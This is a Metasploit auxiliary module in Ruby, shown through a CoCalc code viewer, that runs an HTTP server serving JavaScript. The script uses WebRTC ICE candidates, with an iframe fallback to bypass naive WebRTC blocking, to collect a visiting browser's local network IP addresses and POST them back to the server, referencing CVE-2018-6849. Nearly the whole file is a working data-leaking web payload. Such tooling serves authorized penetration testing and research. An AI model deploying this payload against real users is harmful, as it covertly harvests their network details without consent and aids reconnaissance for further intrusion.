Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/gather/browser_lanipleak.rb
19591 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpServer

8


9
  def initialize(info = {})

10
    super(

11
      update_info(

12
        info,

13
        'Name' => 'HTTP Client LAN IP Address Gather',

14
        'Description' => %q{

15
          This module retrieves a browser's network interface IP addresses

16
          using WebRTC.

17
        },

18
        'License' => MSF_LICENSE,

19
        'Author' => [

20
          'Daniel Roesler', # JS Code

21
          'Dhiraj Mishra'   # MSF Module

22
        ],

23
        'References' => [

24
          [ 'CVE', '2018-6849' ],

25
          [ 'URL', 'http://net.ipcalf.com/' ],

26
          [ 'URL', 'https://www.inputzero.io/p/private-ip-leakage-using-webrtc.html' ]

27
        ],

28
        'DisclosureDate' => '2013-09-05',

29
        'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],

30
        'PassiveActions' => [ 'WebServer' ],

31
        'DefaultAction' => 'WebServer',

32
        'Notes' => {

33
          'Reliability' => UNKNOWN_RELIABILITY,

34
          'Stability' => UNKNOWN_STABILITY,

35
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

36
        }

37
      )

38
    )

39
  end

40


41
  def run

42
    exploit # start http server

43
  end

44


45
  def setup

46
    # code from: https://github.com/diafygi/webrtc-ips

47
    @html = <<~JS

48
      <script>

49
      //get the IP addresses associated with an account

50
      function getIPs(callback){

51
          var ip_dups = {};

52


53
          //compatibility for firefox and chrome

54
          var RTCPeerConnection = window.RTCPeerConnection

55
              || window.mozRTCPeerConnection

56
              || window.webkitRTCPeerConnection;

57
          var useWebKit = !!window.webkitRTCPeerConnection;

58


59
          //bypass naive webrtc blocking using an iframe

60
          if(!RTCPeerConnection){

61
              //NOTE: you need to have an iframe in the page right above the script tag

62
              //

63
              //<iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe>

64
              //<script>...getIPs called in here...

65
              //

66
              var win = iframe.contentWindow;

67
              RTCPeerConnection = win.RTCPeerConnection

68
                  || win.mozRTCPeerConnection

69
                  || win.webkitRTCPeerConnection;

70
              useWebKit = !!win.webkitRTCPeerConnection;

71
          }

72


73
          //minimal requirements for data connection

74
          var mediaConstraints = {

75
              optional: [{RtpDataChannels: true}]

76
          };

77


78
          var servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};

79


80
          //construct a new RTCPeerConnection

81
          var pc = new RTCPeerConnection(servers, mediaConstraints);

82


83
          function handleCandidate(candidate){

84
              //match just the IP address

85
              var ip_regex = /([0-9]{1,3}(\\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/

86
              var ip_addr = ip_regex.exec(candidate)[1];

87


88
              //remove duplicates

89
              if(ip_dups[ip_addr] === undefined)

90
                  callback(ip_addr);

91


92
              ip_dups[ip_addr] = true;

93
          }

94


95
          //listen for candidate events

96
          pc.onicecandidate = function(ice){

97


98
              //skip non-candidate events

99
              if(ice.candidate)

100
                  handleCandidate(ice.candidate.candidate);

101
          };

102


103
          //create a bogus data channel

104
          pc.createDataChannel("");

105


106
          //create an offer sdp

107
          pc.createOffer(function(result){

108


109
              //trigger the stun server request

110
              pc.setLocalDescription(result, function(){}, function(){});

111


112
          }, function(){});

113


114
          //wait for a while to let everything done

115
          setTimeout(function(){

116
              //read candidate info from local description

117
              var lines = pc.localDescription.sdp.split('\\n');

118


119
              lines.forEach(function(line){

120
                  if(line.indexOf('a=candidate:') === 0)

121
                      handleCandidate(line);

122
              });

123
          }, 1000);

124
      }

125


126
      getIPs(function(ip){

127
        //console.log(ip);

128
        var xmlhttp = new XMLHttpRequest;

129
        xmlhttp.open('POST', window.location, true);

130
        xmlhttp.send(ip);

131
      });

132
      </script>

133
    JS

134
  end

135


136
  def on_request_uri(cli, request)

137
    case request.method.downcase

138
    when 'get'

139
      print_status("#{cli.peerhost}: Sending response (#{@html.size} bytes)")

140
      send_response(cli, @html)

141
    when 'post'

142
      begin

143
        ip = request.body

144
        if ip =~ /\A([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})\z/

145
          print_good("#{cli.peerhost}: Found IP address: #{ip}")

146
        else

147
          print_error("#{cli.peerhost}: Received malformed IP address")

148
        end

149
      rescue

150
        print_error("#{cli.peerhost}: Received malformed reply")

151
      end

152
    else

153
      print_error("#{cli.peerhost}: Unhandled method: #{request.method}")

154
    end

155
  end

156
end

157


158